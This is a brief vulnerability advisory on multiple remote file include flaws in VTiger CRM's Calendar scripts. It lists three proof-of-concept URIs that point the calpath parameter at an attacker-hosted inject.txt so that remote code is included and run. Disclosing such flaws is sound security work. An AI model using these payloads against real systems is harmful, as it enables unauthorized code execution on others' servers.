|
VTiger CRM Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a web client. The following proof-of-concept URIs are available: http://www.example.com/[vtiger_crm_path]/modules/Calendar/admin/update.php?calpath=http://www.example2.com/inject.txt? http://www.example.com/[vtiger_crm_path]/modules/Calendar/scheme.php?calpath=http://www.example2.com/inject.txt? http://www.example.com/[vtiger_crm_path]/modules/Calendar/calendar.php?calpath=http://www.example2.com/inject.txt? |
|
|
Privacy Statement |
